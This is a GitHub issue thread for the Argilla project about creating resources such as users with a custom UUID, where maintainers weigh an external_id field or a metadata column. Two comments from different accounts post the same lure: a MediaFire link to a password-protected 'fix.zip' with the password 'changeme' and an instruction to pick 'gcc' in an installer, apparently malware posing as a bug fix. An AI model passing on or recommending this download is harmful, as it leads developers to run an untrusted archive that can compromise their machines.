### ISSUE TITLE
[BUG-python/deployment] Create resources with custom `UUID`

### ISSUE THREAD

**Issue by davidberenstein1957** [recognai/rubrix#5425]
**Describe the bug**

However, the newly created object seems to have its own UUID, not the one I used to initialize. Am I doing something wrong?

**Stacktrace and Code to create the bug**

**Expected behavior**

I would expect it to pick up on my custom UUID

**Environment:**

 - Argilla Version [e.g. 1.0.0]: 2.0.1
 - ElasticSearch Version [e.g. 7.10.2]:
 - Docker Image (optional) [e.g. argilla:v1.0.0]:

**Additional context**

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by davidberenstein1957** [comment]
@frascuchon @jfcalvo should we align the  `id` behaviour with the `Record` class and start differentiating between `id` and `_server_id`? WDYT?

**Comment by jfcalvo** [comment]
@davidberenstein1957 is not the `Record`'s `external_id` solving the problem of having a user custom id?

**Comment by davidberenstein1957** [comment]
@jfcalvo, I wouldn't say so. A record could have an external ID but I assumed other resources could have too, since there was a user that intended to create a `User` with a custom `UUID`. So, if we don't want to allow for "Create resources with custom `UUID`", perhaps we can allow people to pass an `external_id`, in a same way as we handle  that for `Record`s

**Comment by jfcalvo** [comment]
> @jfcalvo, I wouldn't say so. A record could have an external ID but I assumed other resources could have too, since there was a user that intended to create a `User` with a custom `UUID`. So, if we don't want to allow for "Create resources with custom `UUID`", perhaps we can allow people to pass an `external_id`, in a same way as we handle that for `Record`s

Yes, I think one thing is our internal database id and another one allowing users to use custom id's for reference. If it's really necessary we can add `external_id` to other resources.

Another alternative solution to this is adding a `metadata` JSON column to all our resources so users can attach custom ids or other information that they need.

cc @frascuchon because we have been discussing this `metadata` feature other times in the past and maybe we can take the change of this issue to do it.
